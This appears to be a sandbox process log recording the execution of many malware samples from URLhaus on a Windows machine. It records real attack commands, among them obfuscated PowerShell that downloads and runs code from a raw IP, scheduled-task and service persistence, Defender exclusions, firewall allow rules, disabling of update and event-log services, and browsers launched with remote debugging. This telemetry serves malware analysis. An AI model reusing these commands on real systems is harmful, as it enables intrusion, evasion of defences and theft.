C:\Windows\system32\reg.exe
reg query HKEY_CLASSES_ROOT\http\shell\open\command
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.pornhub.com/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x13c,0x140,0x144,0x118,0x148,0x7ffd1a2946f8,0x7ffd1a294708,0x7ffd1a294718
C:\Windows\system32\attrib.exe
attrib +s +h d:\net
C:\Users\Admin\DOWNLO~1\URLHAU~1\PowerShell.exe
powershell -c "invoke-webrequest -uri http://206.217.142.166:1234/windows/v2/dr.bat -outfile d:\net\dr\dr.bat"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2244,9164550193247118297,17986245754295908831,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2268 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2244,9164550193247118297,17986245754295908831,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2320 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2244,9164550193247118297,17986245754295908831,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2896 /prefetch:8
C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.exe
"C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.exe" -service -lunch
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,9164550193247118297,17986245754295908831,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3464 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,9164550193247118297,17986245754295908831,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3472 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x21c,0x220,0x224,0x1f8,0x228,0x7ffd1851cc40,0x7ffd1851cc4c,0x7ffd1851cc58
C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.exe
"C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\Downloads\UrlHausFiles\1krecrypted')
C:\Users\Admin\Downloads\UrlHausFiles\ClientServices.exe
"C:\Users\Admin\Downloads\UrlHausFiles\ClientServices.exe" /VERYSILENT /SUPPRESSMSGBOXES
C:\Windows\system32\schtasks.exe
SchTasks /Create /SC ONLOGON /TN "my dr" /TR "d:\net\dr\dr.bat" /f
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
"C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe"
C:\Users\Admin\AppData\Local\Temp\is-GSMT9.tmp\ClientServices.tmp
"C:\Users\Admin\AppData\Local\Temp\is-GSMT9.tmp\ClientServices.tmp" /SL5="$304A2,965278,203776,C:\Users\Admin\Downloads\UrlHausFiles\ClientServices.exe" /VERYSILENT /SUPPRESSMSGBOXES
C:\Users\Admin\AppData\Roaming\PowerShell.exe
"C:\Users\Admin\AppData\Roaming\PowerShell.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2320,i,10047485688402802486,4538697997216470580,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=2316 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1784,i,10047485688402802486,4538697997216470580,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=2388 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2000,i,10047485688402802486,4538697997216470580,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=2492 /prefetch:8
C:\Windows\SysWOW64\regsvr32.exe
"regsvr32.exe" /s /i:INSTALL "C:\Users\Admin\AppData\Roaming\\HollowSwallow.dll"
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\Downloads\UrlHausFiles\SearchUII.exe" "SearchUII.exe" ENABLE
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\svchost.exe" "svchost.exe" ENABLE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\Admin\AppData\Roaming\HollowSwallow.dll' }) { exit 0 } else { exit 1 }"
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2244,9164550193247118297,17986245754295908831,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2280 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2244,9164550193247118297,17986245754295908831,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2620 /prefetch:3
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads\UrlHausFiles\caspol.exe"
C:\Users\Admin\Downloads\UrlHausFiles\caspol.exe
"C:\Users\Admin\Downloads\UrlHausFiles\caspol.exe"
C:\Users\Admin\Downloads\UrlHausFiles\caspol.exe
"C:\Users\Admin\Downloads\UrlHausFiles\caspol.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1076 -ip 1076
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 1076 -ip 1076
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1076 -s 1540
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1076 -s 1552
C:\Users\Admin\Downloads\UrlHausFiles\def.exe
"C:\Users\Admin\Downloads\UrlHausFiles\def.exe"
C:\Users\Admin\Downloads\UrlHausFiles\stories.exe
"C:\Users\Admin\Downloads\UrlHausFiles\stories.exe"
C:\Users\Admin\AppData\Local\Temp\is-K0VKJ.tmp\stories.tmp
"C:\Users\Admin\AppData\Local\Temp\is-K0VKJ.tmp\stories.tmp" /SL5="$2050C,3300090,54272,C:\Users\Admin\Downloads\UrlHausFiles\stories.exe"
C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe
"C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe"
C:\Users\Admin\AppData\Local\palladiums\translucently.exe
"C:\Users\Admin\Downloads\UrlHausFiles\FACTURA09876567000.bat"
C:\Users\Admin\AppData\Local\PhantomSoft\Support\winvnc.exe
C:\Users\Admin\AppData\Local\PhantomSoft\Support\winvnc.exe
C:\Users\Admin\Downloads\UrlHausFiles\4XYFk9r.exe
"C:\Users\Admin\Downloads\UrlHausFiles\4XYFk9r.exe"
C:\Users\Admin\Downloads\UrlHausFiles\4.exe
"C:\Users\Admin\Downloads\UrlHausFiles\4.exe"
C:\Users\Admin\Downloads\UrlHausFiles\zke-ascv.exe
"C:\Users\Admin\Downloads\UrlHausFiles\zke-ascv.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\dbdzkqmG.cmd" "
C:\Windows\SysWOW64\svchost.exe
"C:\Users\Admin\Downloads\UrlHausFiles\FACTURA09876567000.bat"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 4726' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network4726Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Users\Admin\AppData\Local\palladiums\translucently.exe
"C:\Users\Admin\AppData\Local\palladiums\translucently.exe"
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x44c 0x480
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Users\Admin\Downloads\UrlHausFiles\xxx.exe
"C:\Users\Admin\Downloads\UrlHausFiles\xxx.exe"
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:INSTALL C:\Users\Admin\AppData\Roaming\HollowSwallow.dll\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{E521CF46-287D-426C-F1A1-1D45718E3044}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries) -RunLevel Highest"
C:\Users\Admin\Downloads\UrlHausFiles\opengl32.dll40watson-sanchez4040830.exe
"C:\Users\Admin\Downloads\UrlHausFiles\opengl32.dll40watson-sanchez4040830.exe"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Users\Admin\Downloads\UrlHausFiles\downloader.exe
"C:\Users\Admin\Downloads\UrlHausFiles\downloader.exe"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Users\Admin\AppData\Roaming\powershell.exe
powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\Downloads\UrlHausFiles\666.exe
"C:\Users\Admin\Downloads\UrlHausFiles\666.exe"
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
C:\Users\Admin\Downloads\UrlHausFiles\ew.exe
"C:\Users\Admin\Downloads\UrlHausFiles\ew.exe"
C:\Users\Admin\Downloads\UrlHausFiles\imgdisk.exe
"C:\Users\Admin\Downloads\UrlHausFiles\imgdisk.exe"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
C:\Users\Admin\Downloads\UrlHausFiles\caspol.exe
"C:\Users\Admin\Downloads\UrlHausFiles\caspol.exe"
C:\ProgramData\Google\Chrome\updater.exe
C:\ProgramData\Google\Chrome\updater.exe
C:\Users\Admin\Downloads\UrlHausFiles\FiddlerSetup.exe
"C:\Users\Admin\Downloads\UrlHausFiles\FiddlerSetup.exe"
C:\Users\Admin\AppData\Local\Temp\nsl2CB4.tmp\FiddlerSetup.exe
"C:\Users\Admin\AppData\Local\Temp\nsl2CB4.tmp\FiddlerSetup.exe" /D=
C:\Windows\SysWOW64\esentutl.exe
C:\\Windows\\System32\\esentutl.exe /y C:\Users\Admin\Downloads\UrlHausFiles\winnit.exe /d C:\\Users\\Public\\Libraries\\Gmqkzdbd.PIF /o
C:\Windows\SysWOW64\colorcpl.exe
C:\Windows\System32\colorcpl.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 3832 -ip 3832
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Users\Admin\Downloads\UrlHausFiles\random.exe
"C:\Users\Admin\Downloads\UrlHausFiles\random.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3832 -s 1772
C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.exe
"C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.exe"
C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.exe
"C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.exe" -service -lunch
C:\Users\Admin\Downloads\UrlHausFiles\SQL2019-SSEI-Dev.exe
"C:\Users\Admin\Downloads\UrlHausFiles\SQL2019-SSEI-Dev.exe"
C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.exe
"C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.exe"
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Users\Admin\Downloads\UrlHausFiles\%E5%9B%9B%E6%96%B9%E5%B9%B3%E5%8F%B0-%E5%8D%A1%E5%95%86%E7%AB%AF.exe
"C:\Users\Admin\Downloads\UrlHausFiles\%E5%9B%9B%E6%96%B9%E5%B9%B3%E5%8F%B0-%E5%8D%A1%E5%95%86%E7%AB%AF.exe"
C:\Users\Admin\AppData\Local\Temp\3582-490\SQL2019-SSEI-Dev.exe
"C:\Users\Admin\AppData\Local\Temp\3582-490\SQL2019-SSEI-Dev.exe"
C:\Users\Admin\Downloads\UrlHausFiles\InstallSetup.exe
"C:\Users\Admin\Downloads\UrlHausFiles\InstallSetup.exe"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\DOWNLO~1\URLHAU~1\c1.exe"
C:\Users\Admin\DOWNLO~1\URLHAU~1\c1.exe
C:\Users\Admin\DOWNLO~1\URLHAU~1\c1.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\DOWNLO~1\URLHAU~1\file.exe"
C:\Users\Admin\DOWNLO~1\URLHAU~1\file.exe
C:\Users\Admin\DOWNLO~1\URLHAU~1\file.exe
C:\Windows\SYSTEM32\wscript.exe
"wscript" C:\Users\Admin\AppData\Local\Temp\tempScript.js
C:\Users\Admin\Downloads\UrlHausFiles\xxx.exe
C:\Users\Admin\Downloads\UrlHausFiles\xxx.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\JKJKJJDBKEGI" & exit
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c timeout /t 10 & rd /s /q C:\ProgramData\JKJKJJDBKEGI & exit
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE"
C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE
C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads\UrlHausFiles\caspol.exe"
C:\Users\Admin\Downloads\UrlHausFiles\caspol.exe
"C:\Users\Admin\Downloads\UrlHausFiles\caspol.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\Admin\Downloads\UrlHausFiles\caspol.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/2.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/2.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
C:\Windows\SysWOW64\timeout.exe
timeout /t 10
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C0D5.tmp\C0D6.tmp\C0D7.bat C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE"
C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\C0D5.tmp\C0D6.tmp\C0D7.bat C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/3.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/3.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3644TM~1.EXE"
C:\Users\Admin\AppData\Local\Temp\3644TM~1.EXE
C:\Users\Admin\AppData\Local\Temp\3644TM~1.EXE
C:\Users\Admin\AppData\Roaming\PowerShell.exe
"C:\Users\Admin\AppData\Roaming\PowerShell.exe"
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
"C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe"
C:\Windows\system32\whoami.exe
whoami
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\CMD.vbs"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x224,0x228,0x22c,0x200,0x230,0x7ffd36cdcc40,0x7ffd36cdcc4c,0x7ffd36cdcc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2344,i,17324242646833497250,2402229393215099446,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=2340 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1776,i,17324242646833497250,2402229393215099446,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=2392 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1964,i,17324242646833497250,2402229393215099446,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=2496 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3096,i,17324242646833497250,2402229393215099446,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=3180 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3104,i,17324242646833497250,2402229393215099446,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=3312 /prefetch:1
C:\Windows\explorer.exe
explorer.exe
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4584,i,17324242646833497250,2402229393215099446,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4596 /prefetch:1
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\PROGRA~1\MOZILL~1\firefox.exe"
C:\PROGRA~1\MOZILL~1\firefox.exe
C:\PROGRA~1\MOZILL~1\firefox.exe
C:\PROGRA~1\MOZILL~1\firefox.exe
C:\PROGRA~1\MOZILL~1\firefox.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ffd1b6846f8,0x7ffd1b684708,0x7ffd1b684718
C:\PROGRA~1\MOZILL~1\firefox.exe
"C:\PROGRA~1\MOZILL~1\firefox.exe" -contentproc --channel=1964 -parentBuildID 20240401114208 -prefsHandle 1892 -prefMapHandle 1884 -prefsLen 23681 -prefMapSize 244658 -appDir "C:\PROGRA~1\MOZILL~1\browser" - {2e6a4698-87b5-4c10-9b1f-73add825db45} 6200 "\\.\pipe\gecko-crash-server-pipe.6200" gpu
C:\Users\Admin\AppData\Roaming\powershell.exe
powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\PROGRA~1\MOZILL~1\firefox.exe
